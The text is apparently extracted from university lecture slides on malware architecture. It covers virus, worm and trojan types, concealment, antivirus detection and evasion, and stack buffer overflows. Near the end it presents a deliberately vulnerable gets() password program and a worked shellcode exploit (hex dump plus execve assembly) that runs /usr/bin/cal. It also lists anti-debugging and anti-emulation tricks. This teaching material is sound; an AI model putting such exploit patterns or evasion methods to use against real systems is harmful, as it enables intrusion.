Malware Architecture COEN 250. Malware Types Self-replicating malware Creates new instances of itself In contrast to passive replication Population

Malware Architecture

COEN 250

Malware Types

Self-replicating malwareCreates new instances of itself In contrast to passive replication

Population growthChanges in number of instances

Parasitic malwareRequires some other executable code to exist

Malware Types

Logic Bomb not self-replicating, zero population growth, possibly

parasitic Consists of

Payload An action to be performed

Trigger Boolean condition to be executed

Example: If Thomas Schwarz is not getting paid then delete the COEN

website.

Malware Types

Trojan Horse parasitic Program that purports doing something benign But secretely performs a malicious task Example:

Authentic looking login page with username and password prompt

Stores result in a file, exits user, so that true login page appears

Malware Types

Backdoor Mechanism that bypasses normal security checks

Virus Self-replicating Positive Population Growth Parasitic Runs when a certain executable runs Infects other executables

Traveling on same system, floppy, CD, DVD, USB First mentioned in SF novel “The Scarred Man” Gregory

Benford, 1970

Malware Types

Wormself-replicatingpositive population growthnot parasiticSpread from machine to machine across a

network

Malware Types

RabbitsTries to consume all system resources by

multiplying quickly Fork bomb

A worm that deletes itself after infecting another machine

Worm hops from machine to machine

Malware Types

Spyware Software that collects information from a

system and transmits it to someone else. Addware

Spyware that presents adds.

Virus

Viruses consist of Infection Mechanism

Can be multipartite

Trigger (optional)Payload (optional)

Virus

Target Classification Boot-Sector Infectors File Infectors Macro Viruses

Concealment Strategy Classification No Concealment Encryption Stealth Oligomorphism, Polymorphism, Metamorphism

Virus: Boot Sector Infectors

Contains code that runs when a system starts up.

Volume Boot RecordFirst sector of an unpartitioned storage deviceFirst sector of an individual partition

Master Boot RecordFirst sector of data storage device that has

been partitioned


Booting: Bootstrap loader

Loads software to start OS Multi-stage bootstrap loader Boot sequence on IBM-PC

Runs instruction at memory location F000:FFF0 of BIOS Jumps to execution of BIOS startup program Executes Power-On Self-Test (POST)

Checks, initializes devices Goes through preconfigured list of devices If it finds bootable device, loads, and executes boot sector

Assume MBR on hard drive MBR contains address of bootable partition Load boot sector of bootable partition Boot sector moves OS kernel into memory and starts it


Boot Sector Infector Copies itself into the MBR or VBR Typically after making copy of MBR in a “safe

location” Michelangelo:

April 1991 Moves original boot sector to safe location Infects all floppy disks inserted into computer Payload:

overwrites file system with zeroes Extinct in the wild


Boot Sector Infector Stoned Virus

Original version infects only 360KB diskettes 1988 Many variants Behavior

Becomes memory resident Disables interrupt 12 Infects MBR Infects all diskettes

Moves boot sector to sector 11 and copies itself into sector 0 Same values as chosen by Michelangelo, so that computers infected with

both became immediately dysfunctional Usually destroys part of the file system

Payload: Displays message during boot process: “Your PC is now Stoned! Your computer is now stoned.


Extinct in the wild:Floppies are rarely used to boot, disabling the

propagation mechanismOS prevent writing to a disk’s boot sector

without proper authorizationBIOS can enable boot block protection

Virus: File Infectors

Virus infects executablesVirus is placed in an executable

Prepending Virus: At the beginning Execution of a *.com loads file into memory Set PC to beginning of file Often copies infected file further down

Virus: File Infectors Appending Virus: At the end

To get control Save original instruction in code, replace by jump to viral

code, execute virus, restore original instruction and jump to them or run original instruction at saved location followed by jump to the rest of the code

Executable file formats can specify start location in file header


Overwriting Viruses Atop original code Does not change file size Virus gets control in normal execution of file Placement Strategies:

Place virus in superfluous data Place virus in file slack or unused allocated file space Stash overwritten contents in a companion file Compress (parts of) the original file, decompress


Inserting VirusMove target code out of way Intersperse small pieces of virus with infected

file Companion Virus

Virus gets executed before infected file Infected file barely changed


Companion Virus Example Change name of target file

Copy notepad.exe to notepad.exp Virus is in new notepad.exe, which calls notepad.exp

Virus placed earlier in search path notepad.exe in a different directory than real notepad.exe notepad.com is executed before notepad.exe

Use Windows registry to change association for .exe files Change “interpreter in ELF files

Typically the run-time linker, but now virus Associate icon of target with virus

Virus: Macro Virus

MacrosCode that is part of documents.Used extensively in MS Office Tools

Written in or translated to Visual Basic for Applications (VBA) code

Macro VirusChanges or creates new macro

Virus: Macro Virus

Example:Concept 1995-1997 Infects Word’s global document-template

NORMAL.DOT Creates PayLoad and FileSaveAs macros Infects all documents saved with the Save As

command

Virus: Macro Virus

Example: Laroux1996 – Excel macro virusConsists of auto_open and check_files

auto_open executes whenever an infected spreadsheet is opened, followed by check_files

Virus looks for PERSONAL.XLS

Virus contains no malicious payload

Virus: Macro Virus

Protective StrategiesLater versions of MS Office have security

levels for execution of macros Level high only executes signed macros

MS Office provides warnings when files contain macros

ScanProt (Word prior to 7.0a) scans for the Concept virus

Virus: Concealment

EncryptionVirus body is encrypted to make it harder to

detectVirus needs to contain a decryption engineEncryption methods range from very simple to

strong

Virus: Concealment

Stealth Virus takes active steps to conceal infection

Restore original file timestamp Intercept system calls to play back original information of file

Change I/O calls in DOS Change system libraries in more sophisticated OS Run rootkit

Anti-stealth virus Virus makes all files look infected Payload: Anti-virus software deletes all other files

Virus: Concealment

Oligomorphism Encrypted virus changes encryption key between infections Infected files have different file signatures

Polymorphism Virus also changes decryption engine

By using equivalent instruction sequences By using different versions

Tremor had 6 decryption engines Makes it difficult for virus to detect its presence

Virus can use specific timestamp (e.g. add 100 to file year) Pad file sizes of infected files to a certain value Use hidden flags in ELF format Use metadata or alternative data streams (in NTFS) Store data in registry or other location

Virus: Concealment

Hiding Decryptor Engine Using a mutation engine

Instruction equivalence All these set register r0 to zero:

clear r0 xor r0,r0 and 0, r0 move 0, r0

Instruction sequence equivalence Instruction reordering Register renaming Data reordering Spaghetti code Junk code insertion Run-time code generation Use a virtual machine Use concurrent threads to make analysis difficult Inlining, outlining, call sequence changes

Virus: Concealment

MetamorphismUse code modification to change body of virus

Virus: Antivirus Techniques

Detection Identification Disinfection

Virus: Antivirus TechniquesStatic Detection Mechanism

On-demand / On –access scanning Virus signatures a.k.a scan strings:

Identifying substrings in infected codeProblem: How to search for many patterns at

once Static Heuristics

Positive HeuristicsNegative Heuristics


Positive Heuristics (Boosters) Junk code Decryption loops Self-modifying code Use of undocumented API Manipulation of interrupt vectors Unusual instructions, especially those not emitted by a compiler Strings containing obscenities or “virus” Difference between entry point and end of file Spectral analysis

Frequency analysis of instructions


Negative heuristics = stoppersuser inputGUI popups

AnalysisWeighted measure

trained by good and bad setsNeural networksData mining


Integrity Checks Tripwire:

Calculate cryptographically secure hash of all system files Store it in unchangable directory

E.g. CD-ROM Scan periodically to check integrity of all system files Updates:

Check integrity of system Patch system Calculate new checksums

Self-checking of antivirus software

Virus: Antivirus TechniquesDynamic Methods

Behavior blockers: Software monitors running program in real time Watches for suspicious activity such as file system

accesses Appending virus opens executable for reading and writing Generates activity signature of bad pattern:

open, read, write, seek to end, appending, close

Use notion of ownership to prevent too many false positives

Virus: Antivirus Techniques Dynamic Methods

Emulation Analyze code before letting it run

Emulation uses dynamic heuristics Same as static heuristics Same as behavior blockers

Emulation uses generic decryption Use virus’ own decryption loop to scan for decrypted virus

Decryption loop should have run when: Program accesses code that it just modified 24B + of modified memory

Emulator can run signature searches some time into run-time of emulated code


Emulator Architecture Single stepping through a program can be detected by virus through

timing Instead:1. CPU emulation2. Memory emulation3. Hardware and OS emulation4. Emulation control

Major Issue: When to stop Number of instructions Amount of time spent emulating Proportion of instructions that modify memory Presence of stoppers

5. Post Analysis Data Instruction histogram Dead code


Reentering emulation:Virus code can be CPU specific. Emulation

might need to run with different CPU parameters.

Installation of interrupt handlers should trigger emulation of the interrupt handlers

Using goats to verify infective behaviorEmulator provides a goat file to suspect file to

see changes.

Virus: Antivirus TechniquesVerification and Identification

Verification reduces false positives necessary for disinfection

Difficult only with polymorphic viruses Try to decrypt virus body – X-raying

Side effect of emulating decryptor engine Breaking weak encryption

Identify using signatures known copy of virus check-summing of virus

Virus: Antivirus TechniquesQuarantine

Quarantine isolates infected file from rest of the systemOften, copying of file to a quarantine directoryTrivially encrypt file to make it unrunnableRender files in quarantine directory invisible

Virus: Antivirus TechniquesDisinfection

Restore files from backup Virus-specific actions

Virus: Antivirus TechniquesAnti-Macro Virus

Macro can change through reformattingMS Word document converter has produced

new versions of a macro virusBugs in macro virus propagation mechanism

can introduce new variantsMacro virus can incorporate other macros

Happened to a Word macro snatching two anti-virus macros from MS

Anti-Anti-Virus Techniques

Aggressively attack anti-virus software Impede anti-virus analysis by anti-virus

labs Use knowledge of anti-virus mechanisms

to avoid dectection Not anti-virus virus

“Beneficial” virus

Anti-Anti-Virus TechniquesRetrovirus

Disables anti-virus software Virus has list of process names of anti-virus products Kills any processes with these names Disables antivirus program

Ganda inspects programs that run at start-up (autorun) Replaces first instruction of identified anti-virus programs

with a return Reduce priority of anti-virus software so that it never

runs Disable look-up of antivirus software updates

Anti-Anti-Virus Techniques

Entry point obfuscation (EPO)Alternative ways of getting virus code to run

Simile, Ganda look for calls to ExitProcess API

Anti-Anti-Virus TechniquesAnti-Emulation

Outlast emulationVirus can do nothing bad for a long timeVirus only replicates randomlyEntry-point obfuscation also delays virus

execution Outsmarting emulation

Restructure viral code No longer looks like a virus

Anti-Anti-Virus TechniquesAnti-Emulation

Emulator detection Use undocumented CPU instructions

In the hope that emulator crashes on them Exploit differences in CPU Attack emulator memory system

use many memory addresses go to unusual memory locations

Test for changes between API calls E.g. emulator returns always the same time stamp

Import obscure libraries Looking for external things

Hard to emulate Check for specific emulators

Anti-Anti-Virus TechniquesArmoring, Anti-Debugging

Armoring Use anti-reverse engineering techniques to make analysis of

virus behavior difficult Detecting Debug Mode

Use debugger specific idiosyncrasies Detect breakpoint insertion

Breakpoints are implemented through system interrupts Check for single-stepping

Interrupt dumps info on stack Push on stack, then pop, see whether item is still there

Check for system time Manipulate prefetch queue in CPU

Use IsDebuggerPresent API

Anti-Anti-Virus TechniquesTunneling

Tunneling virus backtracks interrupt chain to go directly to DOS and BIOS interrupt handlers

Avoids monitoring Only possible in MS-DOS

Kernel software protected in other OS

Anti-Anti-Virus TechniquesAnti-Integrity Checking

Polymorphic virus can hide file changes against simple checksums

Slow virus only changes files that are about to be changed anyway

Anti-Anti-Virus TechniquesAvoidance

Virus infects areas that are not checked by anti-virus software

Worms

Worms: Propagates across a network Typically, does not require user action for

propagation.Virus: Infects files. Typically requires user interaction

Worms

Worm Components Warhead Propagation Engine Target Selection Algorithm Scanning Engine Payload

Worms: Warhead

A piece of code that exploits a vulnerability on the target systemExploits such as Buffer Overflow ExploitsFile Sharing AttacksE-mailCommon Mis-configurations

Worms: Propagation Engine

After gaining access, the worm must transfer itself to the target machine.

Some worms are completely contained in the warhead. File Transfer Mechanisms

FTP TFTP HTTP SMB (MS Server Message Block)

Windows file sharing Unix servers running SAMBA

Worms: Target Selection Algorithm

Once the worm has gained control of a target, it starts looking for new targets.E-mail addressesHost listsTrusted SystemsNetwork NeighborhoodDNS queries Randomly selected ip address.

Worms: Scanning Engine

Once targets are identified, the worm scans for the original vulnerability.

Worms: Payload

Some specific action done on behalf of the attacker.

Opening up a backdoor. Planting a distributed denial of service attack. Performing complex calculations:

password cracking math research (actually happened)

Worms: Spreading

Worm spread is limited Diversity of machines

“Tiny Worm” targeted only machines running security software from a

medium company was successful in infecting most machines with that software.

Worms can contain support for multiple entry methods.

Too many victims crash Fast worms can cause network congestion

Worm Trends:

Multiplatform worms Multiexploit worms Zero-day exploit worms

No chance to patch Fast-spreading worms: Warhol / Flash

pre-scan targets Polymorphic worms

Change appearance Metamorphic worms

Change functionality

Strings A buffer overflow occurs when data is written

outside of the boundaries of the memory allocated to a particular data structure.

SourceMemory

Allocated Memory (8 Bytes)

11 Bytes of Data

Copy Operation

Other Memory

Attacks

Strings

Buffer overflow occur because we usually do not check bounds.Standard library functions do not check

bounds.Programmers do not check bounds.

Not all buffer overflows are exploitable.

Attacks

Strings

Process Memory Organization

Code or Text: Instructions and read only data

Data: Initialized data, uninitialized data, static variables, global variables

Heap: Dynamically allocated variables

Stack: Local variables, return addresses, etc.

Attacks

When calling a subroutine / function: Stack stores the return address Stack stores arguments, return values Stack stores variables local to the subroutine

Information pushed on the stack for a subroutine call is called a frame. Address of frame is stored in the frame or base point

register. epb on Intel architectures

AttacksStack Management

#include <iostream>bool IsPasswordOkay(void){

char Password[8];

gets(Password);if (!strcmp(Password, “badprog"))

return(true);else return(false);

}void main() { bool PwStatus;

puts("Enter password:");PwStatus = IsPasswordOkay();if (PwStatus == false){

puts("Access denied");exit(-1);

}else puts("Access granted");

}


Storage for PwStatus (4 bytes)

Caller EBP – Frame Ptr OS (4 bytes)

Return Addr of main – OS (4 Bytes)

…

Program stack before call to IsPasswordOkay()

puts("Enter Password:"); PwStatus=ISPasswordOkay(); if (PwStatus==true) puts("Hello, Master"); else puts("Access denied");

Stack


Storage for Password (8 Bytes)

Caller EBP – Frame Ptr main (4 bytes)

Return Addr Caller – main (4 Bytes)




…

Program stack during call to IsPasswordOkay()

puts("Enter Password:"); PwStatus=ISPasswordOkay(); if (PwStatus ==true) puts("Hello, Master"); else puts("Access denied");

bool IsPasswordOkay(void){ char Password[8];

gets(Password); if (!strcmp(Password,"badprog")) return(true); else return(false)}

Stack


Program stack after call to IsPasswordOkay()

puts("Enter Password:"); PwStatus=ISPasswordOkay(); if (PwStatus ==true) puts("Hello, Master"); else puts("Access denied");







…

Stack


What happens if we enter more than 7 characters of an input string?

#include <iostream>bool IsPasswordOkay(void){

char Password[8];

gets(Password);if (!strcmp(Password, “badprog"))

return(true);else return(false);

}void main() { bool PwStatus;

puts("Enter password:");PwStatus = IsPasswordOkay();if (PwStatus == false){

puts("Access denied");exit(-1);

}else puts("Access granted");

}

AttacksBuffer Overflow Attack

bool IsPasswordOkay(void){ char Password[8];

gets(Password); if (!strcmp(Password,"badprog")) return(true); else return(false)}


“12345678”


“9012”


“3456”


“7890”


“\0”


…

Stack

The return address and other data on the stack is over written because the memory space allocated for the password can only hold a maximum 7 character plus the NULL terminator.


A specially crafted string “abcdefghijklW►*!” produced the following result:


The string “abcdefghijklW►*!” overwrote 9 extra bytes of memory on the stack changing the callers return address thus skipping the execution of line 3


“abcdefgh”


“ijkl”


“W►*!” (return to line 4 was line 3)


“/0”



Stack

Line Statement

1 puts("Enter Password:");

2 PwStatus=ISPasswordOkay();

3 if (PwStatus ==true)

4 puts("Hello, Master");

5 else puts("Access denied");


A buffer overflow can be exploited byChanging the return address in order to

change the program flow (arc-injection)Change the return address to point into the

buffer where it contains some malicious code (Code injection)

AttacksBuffer Overflow Exploit

The get password program can be exploited to execute arbitrary code by providing the following binary data file as input:

000 31 32 33 34 35 36 37 38-39 30 31 32 33 34 35 36 "1234567890123456"

010 37 38 39 30 31 32 33 34-35 36 37 38 E0 F9 FF BF "789012345678a· +"

020 31 C0 A3 FF F9 FF BF B0-0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v"030 F9 FF BF 8B 15 FF F9 FF-BF CD 80 FF F9 FF BF 31 "· +ï§ · +-Ç ·

+1"040 31 31 31 2F 75 73 72 2F-62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal

“

This exploit is specific to Red Hat Linux 9.0 and GCC


000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456"010 37 38 39 30 31 32 33 34 35 36 37 38 E0 F9 FF BF "789012345678a· +"020 31 C0 A3 FF F9 FF BF B0 0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v"030 F9 FF BF 8B 15 FF F9 FF BF CD 80 FF F9 FF BF 31 "· +ï§ · +-Ç · +1"040 31 31 31 2F 75 73 72 2F 62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal “

The first 16 bytes of binary data fill the allocated storage space for the password. NOTE: Even though the program only allocated 12 bytes for the password, the version of the gcc compiler used allocates stack data in multiples of 16 bytes



The next 12 bytes of binary data fill the extra storage space that was created by the compiler to keep the stack aligned on a16-byte boundary.



The next 12 bytes of binary data fill the extra storage space that was created by the compiler to keep the stack aligned on a16-byte boundary.



The next 4 bytes overwrite the return address. The new return address is 0X BF FF F9 E0 (little-endian)




The malicious code. Purpose of malicious code is to call execve with a user

provided set of parameters. In this program, instead of spawning a shell, we just call

the linux calculator program.



The malicious code: xor %eax,%eax #set eax to zero mov %eax,0xbffff9ff #set to NULL word

Create a zero value and use it to NULL terminate the argument list.

This is necessary to terminate the argument list.



The malicious code: xor %eax,%eax #set eax to zero mov %eax,0xbffff9ff #set to NULL word mov $0xb,%al #set code for execve

Set the value of register al to 0xb. This value indicates a system call to execve.



The malicious code: mov $0xb,%al #set code for execve mov $0xbffffa03,%ebx #ptr to arg 1 mov $0xbffff9fb,%ecx #ptr to arg 2 mov 0xbffff9ff,%edx #ptr to arg 3

This puts the pointers to the arguments into ebc, ecx, and edx registers.



The malicious code: mov $0xbffffa03,%ebx #ptr to arg 1 mov $0xbffff9fb,%ecx #ptr to arg 2 mov 0xbffff9ff,%edx #ptr to arg 3 int $80 # make system call to execve

Now make the system call to execve. The arguments are in the registers.



The malicious code: Last part are the arguments.


./BufferOverflow < exploit.bin now executes /usr/bin/cal\0.


Buffer Overflow Stack

Can be prevented: Stackguard, Canaries, No-Execute Permission Heap

Much harder to prevent Pointer mistakes Dynamic Memory Management Program Flow Mistakes

integer overflow Formatted Output Vulnerability

Only in C, culprit is a printf kludge Concurrency Issues

Intervening event between check and access

AttacksPrimary C / C++ Vulnerabilities

AttacksMobile Code Attacks

Documents

Malware Architecture COEN 250. Malware Types Self-replicating malware Creates new instances of itself In contrast to passive replication Population